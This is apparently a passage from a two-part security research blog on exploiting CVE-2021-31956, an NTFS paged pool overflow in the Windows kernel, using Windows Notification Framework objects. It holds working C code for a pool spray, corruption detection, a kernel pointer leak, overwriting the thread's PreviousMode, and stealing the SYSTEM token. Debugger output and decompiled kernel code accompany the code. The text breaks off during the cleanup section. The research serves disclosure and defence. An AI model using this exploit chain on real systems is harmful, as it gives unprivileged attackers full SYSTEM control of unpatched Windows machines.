ffff8881`dc84e100  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e110  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e120  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e130  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e140  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e150  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e160  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e170  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e180  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e190  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1a0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1b0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1c0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1d0  44444444 44444444 00000000 00000000  DDDDDDDD........
ffff8881`dc84e1e0  00000000 00000000 00000000 00000000  ................
ffff8881`dc84e1f0  00000000 00000000 00000000 00000000  ................

As you can see, EPROCESS+0x8 has been corrupted with attacker controlled data.

At this point typical approaches would be to either:

1) Target the KTHREAD structure’s PreviousMode member

2) Target the EPROCESS token

These approaches and their pros and cons have been discussed previously by EDG team members whilst exploiting a vulnerability in KTM.

The next stage will be discussed within a follow-up blog post as there are still some challenges to face before reliable privilege escalation is achieved.

Summary

In summary, we have described more about the vulnerability and how it can be triggered. We have seen how WNF can be leveraged to enable a novel set of exploit primitives. That is all for now in part 1! In the next blog post I will cover reliability improvements, kernel memory clean-up and the continuation of the exploit.

✇NCC Group Research

CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 2

By: Alex Plaskett

Introduction

In part 1 the aim was to cover the following:

  • An overview of the vulnerability assigned CVE-2021-31956 (NTFS Paged Pool Memory corruption) and how to trigger

  • An introduction into the Windows Notification Framework (WNF) from an exploitation perspective

  • Exploit primitives which can be built using WNF

In this article I aim to build on that previous knowledge and cover the following areas:

  • Exploitation without the CVE-2021-31955 information disclosure

  • Enabling better exploit primitives through PreviousMode

  • Reliability, stability and exploit clean-up

  • Thoughts on detection

The version targeted within this blog was Windows 10 20H2 (OS Build 19042.508). However, this approach has been tested on all Windows versions post 19H1 when the segment pool was introduced.

Exploitation without CVE-2021-31955 information disclosure

I hinted in the previous blog post that this vulnerability could likely be exploited without the usage of the separate EPROCESS address leak vulnerability (CVE-2021-31955). This was also realised by Yan ZiShuang and documented within a separate blog post.

Typically, for Windows local privilege escalation, once an attacker has achieved arbitrary write or kernel code execution then the aim will be to escalate privileges for their associated userland process or spawn a privileged command shell. Windows processes have an associated kernel structure called _EPROCESS which acts as the process object for that process. Within this structure, there is a Token member which represents the process’s security context and contains things such as the token privileges, token type, session id etc.

CVE-2021-31955 led to an information disclosure of the address of the _EPROCESS for each running process on the system and was understood to have been used by the in-the-wild attacks found by Kaspersky. However, in practice, for exploitation of CVE-2021-31956 this separate vulnerability is not needed.

This is due to the _EPROCESS pointer being contained within the _WNF_NAME_INSTANCE as the CreatorProcess member:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Therefore, provided it is possible to obtain a relative read/write primitive using a _WNF_STATE_DATA to read and write a subsequent _WNF_NAME_INSTANCE, we can overwrite the StateData pointer to point at an arbitrary location and also read the CreatorProcess address to obtain the address of the _EPROCESS structure within memory.

The initial pool layout we are aiming for is as follows:

The difficulty here is that low fragmentation heap (LFH) randomisation makes reliably achieving this memory layout harder, and the first iteration of this exploit stayed away from the approach until more research was performed into improving the general reliability and reducing the chances of a BSOD.

As an example, under normal scenarios you might end up with the following allocation pattern for a number of sequentially allocated blocks:

In the absence of an LFH "Heap Randomisation" weakness or vulnerability, this post explains how it is possible to achieve a "reasonably" high level of exploitation success, and what clean-up needs to occur in order to maintain system stability post exploitation.

Stage 1: The Spray and Overflow

Starting from where we left off in the first article, we need to go back and rework the spray and overflow.

Firstly, our _WNF_NAME_INSTANCE is 0xA8 + the POOL_HEADER (0x10), so 0xB8 in size. As mentioned previously this gets put into a chunk of size 0xC0.

We also need to spray _WNF_STATE_DATA objects of size 0xA0, which when added to the header (0x10) and the POOL_HEADER (0x10) also results in a chunk allocation of 0xC0.

As mentioned within part 1 of the article, since we can control the size of the vulnerable allocation, we can ensure that our overflowing NTFS extended attribute chunk is also allocated within the 0xC0 segment. A sketch of what the spray itself might look like is shown below.
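
To make the spray concrete, the following is a minimal sketch of how it might be implemented. The NtCreateWnfStateName and NtUpdateWnfStateData prototypes are undocumented; the definitions and the lifetime/scope enum values below (WnfTemporaryStateName = 3, WnfDataScopeMachine = 4) follow the public WNF research by Alex Ionescu and Gabrielle Viala, and should be treated as assumptions to verify:

```c
#include <windows.h>
#include <winternl.h>
#include <string.h>

typedef struct _WNF_STATE_NAME { ULONG64 Data; } WNF_STATE_NAME;

// Undocumented ntdll exports - prototypes per the public WNF research.
typedef NTSTATUS (NTAPI *NtCreateWnfStateName_t)(
    WNF_STATE_NAME *StateName, ULONG NameLifetime, ULONG DataScope,
    BOOLEAN PersistData, PVOID TypeId, ULONG MaximumStateSize,
    PSECURITY_DESCRIPTOR SecurityDescriptor);
typedef NTSTATUS (NTAPI *NtUpdateWnfStateData_t)(
    WNF_STATE_NAME *StateName, const VOID *Buffer, ULONG Length,
    PVOID TypeId, const VOID *ExplicitScope, ULONG MatchingChangeStamp,
    ULONG CheckStamp);

#define SPRAY_COUNT 10000
WNF_STATE_NAME g_Names[SPRAY_COUNT];

void SprayWnf(void)
{
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    NtCreateWnfStateName_t pCreate =
        (NtCreateWnfStateName_t)GetProcAddress(ntdll, "NtCreateWnfStateName");
    NtUpdateWnfStateData_t pUpdate =
        (NtUpdateWnfStateData_t)GetProcAddress(ntdll, "NtUpdateWnfStateData");

    char data[0xA0];
    memset(data, 'A', sizeof(data));

    for (int i = 0; i < SPRAY_COUNT; i++) {
        // Each creation allocates a 0xC0 _WNF_NAME_INSTANCE chunk
        // (WnfTemporaryStateName = 3, WnfDataScopeMachine = 4 assumed).
        pCreate(&g_Names[i], 3, 4, FALSE, NULL, 0x1000, NULL);
        // Each update allocates a 0xC0 _WNF_STATE_DATA chunk:
        // 0xA0 data + 0x10 _WNF_STATE_DATA header + 0x10 POOL_HEADER.
        pUpdate(&g_Names[i], data, sizeof(data), NULL, NULL, 0, 0);
    }
}
```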

However, since we cannot deterministically know which object will be adjacent to our vulnerable NTFS chunk (as mentioned above), we cannot take a similar approach of freeing holes as in the past article and then reusing the resulting holes, as both the _WNF_STATE_DATA and _WNF_NAME_INSTANCE objects are allocated at the same time, and we need both present within the same pool segment.

Therefore, we need to be very careful with the overflow. We make sure that only the following fields are overflowed by 0x10 bytes (and the POOL_HEADER).

In the case of a corrupted _WNF_NAME_INSTANCE, both the Header and RunRef members will be overflowed:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF

In the case of a corrupted _WNF_STATE_DATA, the Header, AllocatedSize, DataSize and ChangeStamp members will be overflowed:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

As we don’t know whether we are going to overflow a _WNF_NAME_INSTANCE or a _WNF_STATE_DATA first, we can trigger the overflow and check for corruption by looping through and querying each _WNF_STATE_DATA using NtQueryWnfStateData.

If we detect corruption, then we know we have identified our _WNF_STATE_DATA object. If not, then we can repeatedly trigger the spray and overflow until we have obtained a _WNF_STATE_DATA object which allows a read/write across the pool subsegment.
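
A sketch of that corruption check, assuming the sprayed names from the previous sketch and the NtQueryWnfStateData prototype from the same public WNF research:

```c
typedef NTSTATUS (NTAPI *NtQueryWnfStateData_t)(
    WNF_STATE_NAME *StateName, PVOID TypeId, const VOID *ExplicitScope,
    PULONG ChangeStamp, PVOID Buffer, PULONG BufferSize);

#define STATUS_BUFFER_TOO_SMALL ((NTSTATUS)0xC0000023L)
#ifndef NT_SUCCESS
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#endif

// Returns the index of the _WNF_STATE_DATA whose DataSize no longer matches
// the 0xA0 bytes we stored, i.e. our unbounded relative read/write object.
int FindCorruptedStateData(NtQueryWnfStateData_t pQuery)
{
    static char buf[0x10000];

    for (int i = 0; i < SPRAY_COUNT; i++) {
        ULONG stamp = 0, size = sizeof(buf);
        NTSTATUS status = pQuery(&g_Names[i], NULL, NULL, &stamp, buf, &size);

        // An uncorrupted entry reads back exactly the 0xA0 bytes we stored;
        // anything larger means DataSize/AllocatedSize were overflowed.
        if ((NT_SUCCESS(status) || status == STATUS_BUFFER_TOO_SMALL) &&
            size > 0xA0) {
            return i;
        }
    }
    return -1; // no corruption detected - trigger the spray/overflow again
}
```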

There are a few problems with this approach, some which can be addressed and some which there is not a perfect solution for:

  1. We only want to corrupt _WNF_STATE_DATA objects but the pool segment also contains _WNF_NAME_INSTANCE objects due to needing to be the same size. Using only a 0x10 data size overflow and cleaning up afterwards (as described in the Kernel Memory Cleanup section) means that this issue does not cause a problem.

  2. Occasionally our unbounded _WNF_STATE_DATA-containing chunk can be allocated as the final block within the pool segment. This means that when querying with NtQueryWnfStateData, an unmapped memory read will occur off the end of the page. This rarely happens in practice, and increasing the spray size reduces the likelihood of it occurring (see the Exploit Testing and Statistics section).

  3. Other operating system functionality may make an allocation within the 0xC0 pool segment and lead to corruption and instability. From practical testing, performing a large spray before triggering the overflow means this rarely happens within the test environment.

I think it’s useful to document these challenges with modern memory corruption exploitation techniques where it’s not always possible to gain 100% reliability.

Overall, with 1) remediated and 2) and 3) only occurring very rarely, in lieu of a perfect solution we can move to the next stage.

Stage 2: Locating a _WNF_NAME_INSTANCE and overwriting the StateData pointer

Once we have unbounded our _WNF_STATE_DATA by overflowing the DataSize and AllocatedSize as described above and within the first blog post, we can then use the relative read to locate an adjacent _WNF_NAME_INSTANCE.

By scanning through the memory we can locate the pattern "\x03\x09\xa8" which denotes the start of a _WNF_NAME_INSTANCE and from this obtain the interesting member variables.

The CreatorProcess, StateName, StateData and ScopeInstance members can be disclosed from the identified target object.
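
A sketch of the scan, assuming the unbounded read from stage 1 (leak is a local buffer, and the member offsets are those from the _WNF_NAME_INSTANCE layout shown in part 1):

```c
// Pull the rest of the pool subsegment through the corrupted (unbounded)
// _WNF_STATE_DATA, then look for the node header of a _WNF_NAME_INSTANCE
// (NodeTypeCode 0x0903, NodeByteSize 0xA8).
static BYTE leak[0x10000];
ULONG stamp = 0, size = sizeof(leak);
pQuery(&g_Names[victim], NULL, NULL, &stamp, leak, &size);

for (ULONG off = 0; off + 0xA8 <= size; off += 0x10) {
    if (*(ULONG64 *)(leak + off) == 0x0000000000A80903ULL) {
        ULONG64 StateName      = *(ULONG64 *)(leak + off + 0x28);
        ULONG64 StateData      = *(ULONG64 *)(leak + off + 0x58);
        ULONG64 CreatorProcess = *(ULONG64 *)(leak + off + 0x98); // _EPROCESS
        // 'off + 0x58' is also the offset used by the relative write to
        // replace the StateData pointer in the next step.
        break;
    }
}
```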

We can then use the relative write to replace the StateData pointer with an arbitrary location which is desired for our read and write primitive. For example, an offset within the _EPROCESS structure based on the address which has been obtained from CreatorProcess.

Care needs to be taken here to ensure that the location the new StateData value points at overlaps with sane values for AllocatedSize and DataSize preceding the data we wish to read or write.

In this case the aim was to achieve a full arbitrary read and write, but without the constraint of needing to find sane and reliable AllocatedSize and DataSize values prior to the memory it was desired to write to.

Our overall goal was to target the KTHREAD structure’s PreviousMode member and then make use of the APIs NtReadVirtualMemory and NtWriteVirtualMemory to enable a more flexible arbitrary read and write.

It helps to have a good understanding of how these kernel memory structures are used in order to understand how this works. In a massively simplified overview, the kernel mode portion of Windows contains a number of subsystems: the hardware abstraction layer (HAL), the executive subsystems and the kernel. _EPROCESS is part of the executive layer, which deals with general OS policy and operations. The kernel subsystem handles architecture specific details for low level operations, and the HAL provides an abstraction layer to deal with differences between hardware.

Processes and threads are represented at both the executive and kernel "layers" within kernel memory as _EPROCESS/_KPROCESS and _ETHREAD/_KTHREAD structures respectively.

The documentation on PreviousMode states "When a user-mode application calls the Nt or Zw version of a native system services routine, the system call mechanism traps the calling thread to kernel mode. To indicate that the parameter values originated in user mode, the trap handler for the system call sets the PreviousMode field in the thread object of the caller to UserMode. The native system services routine checks the PreviousMode field of the calling thread to determine whether the parameters are from a user-mode source."

Looking at MiReadWriteVirtualMemory, which is called from NtWriteVirtualMemory, we can see that if PreviousMode is not set (i.e. KernelMode) when a user-mode thread executes the syscall, then the address validation is skipped and kernel memory space addresses can be written to:

__int64 __fastcall MiReadWriteVirtualMemory(
        HANDLE Handle,
        size_t BaseAddress,
        size_t Buffer,
        size_t NumberOfBytesToWrite,
        __int64 NumberOfBytesWritten,
        ACCESS_MASK DesiredAccess)
{
  int v7; // er13
  __int64 v9; // rsi
  struct _KTHREAD *CurrentThread; // r14
  KPROCESSOR_MODE PreviousMode; // al
  _QWORD *v12; // rbx
  __int64 v13; // rcx
  NTSTATUS v14; // edi
  _KPROCESS *Process; // r10
  PVOID v16; // r14
  int v17; // er9
  int v18; // er8
  int v19; // edx
  int v20; // ecx
  NTSTATUS v21; // eax
  int v22; // er10
  char v24; // [rsp+40h] [rbp-48h]
  __int64 v25; // [rsp+48h] [rbp-40h] BYREF
  PVOID Object[2]; // [rsp+50h] [rbp-38h] BYREF
  int v27; // [rsp+A0h] [rbp+18h]

  v27 = Buffer;
  v7 = BaseAddress;
  v9 = 0i64;
  Object[0] = 0i64;
  CurrentThread = KeGetCurrentThread();
  PreviousMode = CurrentThread->PreviousMode;
  v24 = PreviousMode;
  if ( PreviousMode )
  {
    if ( NumberOfBytesToWrite + BaseAddress < BaseAddress
      || NumberOfBytesToWrite + BaseAddress > 0x7FFFFFFF0000i64
      || Buffer + NumberOfBytesToWrite < Buffer
      || Buffer + NumberOfBytesToWrite > 0x7FFFFFFF0000i64 )
    {
      return 3221225477i64;
    }
    v12 = (_QWORD *)NumberOfBytesWritten;
    if ( NumberOfBytesWritten )
    {
      v13 = NumberOfBytesWritten;
      if ( (unsigned __int64)NumberOfBytesWritten >= 0x7FFFFFFF0000i64 )
        v13 = 0x7FFFFFFF0000i64;
      *(_QWORD *)v13 = *(_QWORD *)v13;
    }
  }

This technique was also covered previously within the NCC Group blog post on Exploiting Windows KTM too.

So how would we go about locating PreviousMode based on the address of _EPROCESS obtained from our relative read of CreatorProcess? At the start of the _EPROCESS structure, _KPROCESS is included as Pcb.

dt _EPROCESS
ntdll!_EPROCESS
   +0x000 Pcb              : _KPROCESS

Within _KPROCESS we have the following:

 dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_KPROCESS *)0xffffd186087b1300))
(*((ntdll!_KPROCESS *)0xffffd186087b1300))                 [Type: _KPROCESS]
    [+0x000] Header           [Type: _DISPATCHER_HEADER]
    [+0x018] ProfileListHead  [Type: _LIST_ENTRY]
    [+0x028] DirectoryTableBase : 0xa3b11000 [Type: unsigned __int64]
    [+0x030] ThreadListHead   [Type: _LIST_ENTRY]
    [+0x040] ProcessLock      : 0x0 [Type: unsigned long]
    [+0x044] ProcessTimerDelay : 0x0 [Type: unsigned long]
    [+0x048] DeepFreezeStartTime : 0x0 [Type: unsigned __int64]
    [+0x050] Affinity         [Type: _KAFFINITY_EX]
    [+0x0f8] AffinityPadding  [Type: unsigned __int64 [12]]
    [+0x158] ReadyListHead    [Type: _LIST_ENTRY]
    [+0x168] SwapListEntry    [Type: _SINGLE_LIST_ENTRY]
    [+0x170] ActiveProcessors [Type: _KAFFINITY_EX]
    [+0x218] ActiveProcessorsPadding [Type: unsigned __int64 [12]]
    [+0x278 ( 0: 0)] AutoAlignment    : 0x0 [Type: unsigned long]
    [+0x278 ( 1: 1)] DisableBoost     : 0x0 [Type: unsigned long]
    [+0x278 ( 2: 2)] DisableQuantum   : 0x0 [Type: unsigned long]
    [+0x278 ( 3: 3)] DeepFreeze       : 0x0 [Type: unsigned long]
    [+0x278 ( 4: 4)] TimerVirtualization : 0x0 [Type: unsigned long]
    [+0x278 ( 5: 5)] CheckStackExtents : 0x0 [Type: unsigned long]
    [+0x278 ( 6: 6)] CacheIsolationEnabled : 0x0 [Type: unsigned long]
    [+0x278 ( 9: 7)] PpmPolicy        : 0x7 [Type: unsigned long]
    [+0x278 (10:10)] VaSpaceDeleted   : 0x0 [Type: unsigned long]
    [+0x278 (31:11)] ReservedFlags    : 0x0 [Type: unsigned long]
    [+0x278] ProcessFlags     : 896 [Type: long]
    [+0x27c] ActiveGroupsMask : 0x1 [Type: unsigned long]
    [+0x280] BasePriority     : 8 [Type: char]
    [+0x281] QuantumReset     : 6 [Type: char]
    [+0x282] Visited          : 0 [Type: char]
    [+0x283] Flags            [Type: _KEXECUTE_OPTIONS]
    [+0x284] ThreadSeed       [Type: unsigned short [20]]
    [+0x2ac] ThreadSeedPadding [Type: unsigned short [12]]
    [+0x2c4] IdealProcessor   [Type: unsigned short [20]]
    [+0x2ec] IdealProcessorPadding [Type: unsigned short [12]]
    [+0x304] IdealNode        [Type: unsigned short [20]]
    [+0x32c] IdealNodePadding [Type: unsigned short [12]]
    [+0x344] IdealGlobalNode  : 0x0 [Type: unsigned short]
    [+0x346] Spare1           : 0x0 [Type: unsigned short]
    [+0x348] StackCount       [Type: _KSTACK_COUNT]
    [+0x350] ProcessListEntry [Type: _LIST_ENTRY]
    [+0x360] CycleTime        : 0x0 [Type: unsigned __int64]
    [+0x368] ContextSwitches  : 0x0 [Type: unsigned __int64]
    [+0x370] SchedulingGroup  : 0x0 [Type: _KSCHEDULING_GROUP *]
    [+0x378] FreezeCount      : 0x0 [Type: unsigned long]
    [+0x37c] KernelTime       : 0x0 [Type: unsigned long]
    [+0x380] UserTime         : 0x0 [Type: unsigned long]
    [+0x384] ReadyTime        : 0x0 [Type: unsigned long]
    [+0x388] UserDirectoryTableBase : 0x0 [Type: unsigned __int64]
    [+0x390] AddressPolicy    : 0x0 [Type: unsigned char]
    [+0x391] Spare2           [Type: unsigned char [71]]
    [+0x3d8] InstrumentationCallback : 0x0 [Type: void *]
    [+0x3e0] SecureState      [Type: ]
    [+0x3e8] KernelWaitTime   : 0x0 [Type: unsigned __int64]
    [+0x3f0] UserWaitTime     : 0x0 [Type: unsigned __int64]
    [+0x3f8] EndPadding       [Type: unsigned __int64 [8]]

There is a member ThreadListHead which is a doubly linked list of _KTHREAD.

If the exploit only has one thread, then the Flink will be a pointer to an offset from the start of the _KTHREAD:

dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))
(*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))                 [Type: _LIST_ENTRY]
    [+0x000] Flink            : 0xffffd18606a54378 [Type: _LIST_ENTRY *]
    [+0x008] Blink            : 0xffffd18608840378 [Type: _LIST_ENTRY *]

From this we can calculate the base address of the _KTHREAD using the offset of 0x2F8 i.e. the ThreadListEntry offset.

0xffffd18606a54378 - 0x2F8 = 0xffffd18606a54080

We can check this is correct (and see we hit our breakpoint in the previous article):

0: kd> !thread 0xffffd18606a54080
THREAD ffffd18606a54080  Cid 1da0.1da4  Teb: 000000ce177e0000 Win32Thread: 0000000000000000 RUNNING on processor 0
IRP List:
    ffffd18608002050: (0006,0430) Flags: 00060004  Mdl: 00000000
Not impersonating
DeviceMap                 ffffba0cc30c6630
Owning Process            ffffd186087b1300       Image:         amberzebra.exe
Attached Process          N/A            Image:         N/A
Wait Start TickCount      2344           Ticks: 1 (0:00:00:00.015)
Context Switch Count      149            IdealProcessor: 1             
UserTime                  00:00:00.000
KernelTime                00:00:00.015
Win32 Start Address 0x00007ff6da2c305c
Stack Init ffffd0096cdc6c90 Current ffffd0096cdc6530
Base ffffd0096cdc7000 Limit ffffd0096cdc1000 Call 0000000000000000
Priority 8 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Child-SP          RetAddr           : Args to Child                                                           : Call Site
ffffd009`6cdc62a8 fffff805`5a99bc7a : 00000000`00000000 00000000`000000d0 00000000`00000000 ffffba0c`00000000 : Ntfs!NtfsQueryEaUserEaList
ffffd009`6cdc62b0 fffff805`5a9fc8a6 : ffffd009`6cdc6560 ffffd186`08002050 ffffd186`08002300 ffffd186`06a54000 : Ntfs!NtfsCommonQueryEa+0x22a
ffffd009`6cdc6410 fffff805`5a9fc600 : ffffd009`6cdc6560 ffffd186`08002050 ffffd186`08002050 ffffd009`6cdc7000 : Ntfs!NtfsFsdDispatchSwitch+0x286
ffffd009`6cdc6540 fffff805`570d1f35 : ffffd009`6cdc68b0 fffff805`54704b46 ffffd009`6cdc7000 ffffd009`6cdc1000 : Ntfs!NtfsFsdDispatchWait+0x40
ffffd009`6cdc67e0 fffff805`54706ccf : ffffd186`02802940 ffffd186`00000030 00000000`00000000 00000000`00000000 : nt!IofCallDriver+0x55
ffffd009`6cdc6820 fffff805`547048d3 : ffffd009`6cdc68b0 00000000`00000000 00000000`00000001 ffffd186`03074bc0 : FLTMGR!FltpLegacyProcessingAfterPreCallbacksCompleted+0x28f
ffffd009`6cdc6890 fffff805`570d1f35 : ffffd186`08002050 00000000`000000c0 00000000`000000c8 00000000`000000a4 : FLTMGR!FltpDispatch+0xa3
ffffd009`6cdc68f0 fffff805`574a6fb8 : ffffd186`08002050 00000000`00000000 00000000`00000000 fffff805`577b2094 : nt!IofCallDriver+0x55
ffffd009`6cdc6930 fffff805`57455834 : 000000ce`00000000 ffffd009`6cdc6b80 ffffd186`084eb7b0 ffffd009`6cdc6b80 : nt!IopSynchronousServiceTail+0x1a8
ffffd009`6cdc69d0 fffff805`572058b5 : ffffd186`06a54080 000000ce`178fdae8 000000ce`178feba0 00000000`000000a3 : nt!NtQueryEaFile+0x484
ffffd009`6cdc6a90 00007fff`0bfae654 : 00007ff6`da2c14dd 00007ff6`da2c4490 00000000`000000a3 000000ce`178fbee8 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffd009`6cdc6b00)
000000ce`178fdac8 00007ff6`da2c14dd : 00007ff6`da2c4490 00000000`000000a3 000000ce`178fbee8 0000026e`edf509ba : ntdll!NtQueryEaFile+0x14
000000ce`178fdad0 00007ff6`da2c4490 : 00000000`000000a3 000000ce`178fbee8 0000026e`edf509ba 00000000`00000000 : 0x00007ff6`da2c14dd
000000ce`178fdad8 00000000`000000a3 : 000000ce`178fbee8 0000026e`edf509ba 00000000`00000000 000000ce`178fdba0 : 0x00007ff6`da2c4490
000000ce`178fdae0 000000ce`178fbee8 : 0000026e`edf509ba 00000000`00000000 000000ce`178fdba0 000000ce`00000017 : 0xa3
000000ce`178fdae8 0000026e`edf509ba : 00000000`00000000 000000ce`178fdba0 000000ce`00000017 00000000`00000000 : 0x000000ce`178fbee8
000000ce`178fdaf0 00000000`00000000 : 000000ce`178fdba0 000000ce`00000017 00000000`00000000 0000026e`00000001 : 0x0000026e`edf509ba

So we now know how to calculate the address of the `_KTHREAD` kernel data structure which is associated with our running exploit thread. 


At the end of stage 2 we have the following memory layout:

Stage 3: Abusing PreviousMode

Once we have set the StateData pointer of the _WNF_NAME_INSTANCE to just before the _KPROCESS ThreadListHead Flink, we can leak out the Flink value by confusing it with the DataSize and the ChangeStamp; after querying the object we can then calculate it as FLINK = ((uintptr_t)ChangeStamp << 32) | DataSize.

This allows us to calculate the _KTHREAD address using FLINK - 0x2f8.
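
A sketch of the leak follows. WnfRelativeWrite is a hypothetical helper wrapping the relative write from stage 2, and the zero-length query behaviour (failing with STATUS_BUFFER_TOO_SMALL while still returning the confused size and change stamp) is an assumption consistent with the confusion described above:

```c
// Point StateData 8 bytes before _KPROCESS.ThreadListHead (+0x30) so the
// Flink lines up with the DataSize (+0x8) and ChangeStamp (+0xC) fields
// of a fake _WNF_STATE_DATA.
ULONG64 fakeStateData = eprocess + 0x30 - 0x8;
WnfRelativeWrite(nameInstanceOff + 0x58, fakeStateData); // StateData pointer

ULONG stamp = 0, size = 0;
// Zero-length query: assumed to fail with STATUS_BUFFER_TOO_SMALL while
// still filling in the required size (= low DWORD of the Flink) and the
// change stamp (= high DWORD of the Flink).
pQuery(&g_Names[victim], NULL, NULL, &stamp, NULL, &size);

ULONG64 flink   = ((ULONG64)stamp << 32) | size;
ULONG64 kthread = flink - 0x2F8; // ThreadListEntry offset in _KTHREAD
```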

Once we have the address of the _KTHREAD, we need to again find a sane value to confuse with the AllocatedSize and DataSize, to allow reading and writing of the PreviousMode value at offset 0x232.

In this case, pointing it into here:

   +0x220 Process          : 0xffff900f`56ef0340 _KPROCESS
   +0x228 UserAffinity     : _GROUP_AFFINITY
   +0x228 UserAffinityFill : [10]  "???"

Gives the following "sane" values:

dt _WNF_STATE_DATA FLINK-0x2f8+0x220

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : 0xffff900f
   +0x008 DataSize         : 3
   +0x00c ChangeStamp      : 0

This allows the most significant dword of the Process pointer shown above to be used as the AllocatedSize and the UserAffinity to act as the DataSize. Incidentally, we can actually influence the value used for DataSize using SetProcessAffinityMask or launching the process with start /affinity exploit.exe, but for our purposes of being able to read and write PreviousMode this is fine.

Visually this looks as follows after the StateData has been modified:

This gives a 3-byte read (and up to 0xffff900f bytes write if needed – but we only need 3 bytes), within which the PreviousMode is included (i.e. set to 1 before modification):

00 00 01 00 00 00 00 00  00 00 | ..........

Using the most significant dword of the pointer, which is always a kernel mode address, ensures that this is a sufficient AllocatedSize to enable overwriting PreviousMode.
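
Putting this together, a sketch of the PreviousMode read and flip, using the same hypothetical helpers and the offsets from the build under test:

```c
// Repoint StateData at _KTHREAD+0x220: the high DWORD of the Process
// pointer becomes AllocatedSize, UserAffinity (3) becomes DataSize, and the
// 3 readable/writable bytes start at +0x230, covering PreviousMode (+0x232).
WnfRelativeWrite(nameInstanceOff + 0x58, kthread + 0x220);

BYTE bytes[3];
ULONG stamp = 0, size = sizeof(bytes);
pQuery(&g_Names[victim], NULL, NULL, &stamp, bytes, &size);
// bytes[2] == 1 -> PreviousMode is currently UserMode.

bytes[2] = 0; // KernelMode: Nt*VirtualMemory now skips address validation
pUpdate(&g_Names[victim], bytes, sizeof(bytes), NULL, NULL, 0, 0);
```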

Post Exploitation

Once we have set PreviousMode to 0, as mentioned above, this gives an unconstrained read/write across the whole kernel memory space using NtWriteVirtualMemory and NtReadVirtualMemory. This is a very powerful method and demonstrates the value of moving from an awkward-to-use arbitrary read/write to a method which enables easier post exploitation and enhanced clean-up options.

It is then trivial to walk the ActiveProcessLinks within the EPROCESS, obtain a pointer to a SYSTEM token and replace the existing token with this, or to perform escalation by overwriting the _SEP_TOKEN_PRIVILEGES of the existing token, using techniques which have long been used by Windows exploits.
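
As a sketch, the token stealing walk might look as follows, where read64/write64 wrap NtReadVirtualMemory/NtWriteVirtualMemory, and the _EPROCESS offsets (UniqueProcessId at 0x440, ActiveProcessLinks at 0x448, Token at 0x4b8) are the Windows 10 20H2 values, to be verified per build:

```c
#define OFF_PID   0x440 // _EPROCESS.UniqueProcessId (20H2, assumed)
#define OFF_LINKS 0x448 // _EPROCESS.ActiveProcessLinks
#define OFF_TOKEN 0x4b8 // _EPROCESS.Token (_EX_FAST_REF)

void StealSystemToken(ULONG64 eprocess)
{
    ULONG64 cur = eprocess;
    do {
        if ((ULONG64)read64((char *)(cur + OFF_PID)) == 4) { // System process
            ULONG64 systemToken = (ULONG64)read64((char *)(cur + OFF_TOKEN));
            write64((char *)(eprocess + OFF_TOKEN), systemToken);
            return;
        }
        // Follow ActiveProcessLinks.Flink back to the containing _EPROCESS.
        cur = (ULONG64)read64((char *)(cur + OFF_LINKS)) - OFF_LINKS;
    } while (cur != eprocess);
}
```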

Kernel Memory Cleanup

OK, so the above is good enough for a proof of concept exploit, but due to the potentially large number of memory writes needed for exploit success, it could leave the kernel in a bad state. Also, when the process terminates, certain memory locations which have been overwritten could trigger a BSOD when that corrupted memory is used.

This part of the exploitation process is often overlooked by proof of concept exploit writers, but is often the most challenging for use in real world scenarios (red teams / simulated attacks etc.) where stability and reliability are important. Going through this process also helps understand how these types of attacks can be detected.

This section of the blog describes some improvements which can be made in this area.

PreviousMode Restoration

On the version of Windows tested, if we try to launch a new process as SYSTEM whilst PreviousMode is still set to 0, then we end up with the following crash:

```
Access violation - code c0000005 (!!! second chance !!!)
nt!PspLocateInPEManifest+0xa9:
